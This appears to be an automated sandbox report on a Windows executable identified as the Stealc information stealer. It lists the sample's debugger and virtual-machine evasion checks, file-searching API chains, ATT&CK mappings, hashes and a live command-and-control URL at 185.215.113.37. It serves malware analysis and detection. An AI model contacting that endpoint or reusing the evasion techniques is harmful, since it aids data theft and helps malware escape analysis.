                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0894 second address: 8B08B8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6C698AAEF7h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B08B8 second address: 8B08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B08BE second address: 8B08D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F6C698AAEE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B33EE second address: 8B347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F6C6956DA50h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F6C6956DA59h 0x00000012 jmp 00007F6C6956DA56h 0x00000017 popad 0x00000018 nop 0x00000019 mov edx, dword ptr [ebp+122D2671h] 0x0000001f adc dh, 00000032h 0x00000022 push 00000004h 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F6C6956DA48h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e jmp 00007F6C6956DA4Ch 0x00000043 mov dword ptr [ebp+122D1948h], esi 0x00000049 push F234CBF4h 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B347D second address: 8B3481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B36AB second address: 8B36B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B36B0 second address: 8B36B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B6D second address: 8B4B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6A3F second address: 8B6A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6A49 second address: 8B6A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6A4D second address: 8B6A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F501F9 second address: 4F501FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F501FF second address: 4F50205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F50205 second address: 4F50209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F50209 second address: 4F5020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5020D second address: 4F50227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ecx, 08D29F41h 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov si, bx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F50227 second address: 4F50246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 mov eax, 71672EE9h 0x0000000a pop eax 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6C698AAEF0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8624 second address: 7D862A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D862A second address: 7D8642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C698AAEF4h 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7CDE9D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7F4BBD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 631A8A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8529BF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7488Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7504Thread sleep time: -32016s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_003DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_003DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_003DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_003E4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_003DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003DF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_003E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003D16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1160 GetSystemInfo,ExitProcess,0_2_003D1160
                Source: file.exe, file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2072556856.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2072556856.00000000010B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13698
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13643
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13646
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13663
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D45C0 VirtualProtect ?,00000004,00000100,000000000_2_003D45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003E9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9750 mov eax, dword ptr fs:[00000030h]0_2_003E9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003E7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003E9600
                Source: file.exe, file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: XaProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003E7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003E6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003E7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003E7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.3d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		34
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37//Q17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php?21%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpC17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpw17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37//Qfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/(Qfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37/6Qfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpCfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.phpwfile.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmptrueunknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1532502
                    Start date and time:2024-10-13 13:58:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 90
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:59:35API Interceptor7x Sleep call for process: file.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947733368951108
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'814'528 bytes
                    MD5:33f53a09cb02c7459d8723408c86ebbe
                    SHA1:db007d0f88f66d60e9740ac561ee622ed65fd936
                    SHA256:e0e099a250b184d85c84fff09038ae8efa95f967143811bb72032d36f5eb30c0
                    SHA512:84aac21d9248206be0a0d99a29c0ea63e644a9c5da8b4c6490c909b68a223ba4e088c9a28d399dae54ebdf0e9ef8854322ae30348a3d2a9eec95881ed289a383
                    SSDEEP:49152:WsexbnuH1zXIyved86pYoVc0Gfz+n3h/:KRnuVdmd8AjVc0GL+
                    TLSH:F38533B8AA650CDEF9D0A8BC1CD55A0F1F7412B432DF5A49AE4B3B2D482750E0C3B975
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0xa86000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007F6C686B80AAh
                    jng 00007F6C686B80C1h
                    add byte ptr [eax], al
                    jmp 00007F6C686BA0A5h
                    add byte ptr [ecx], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dl
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ebx], cl
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [edx], ecx
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    xor byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
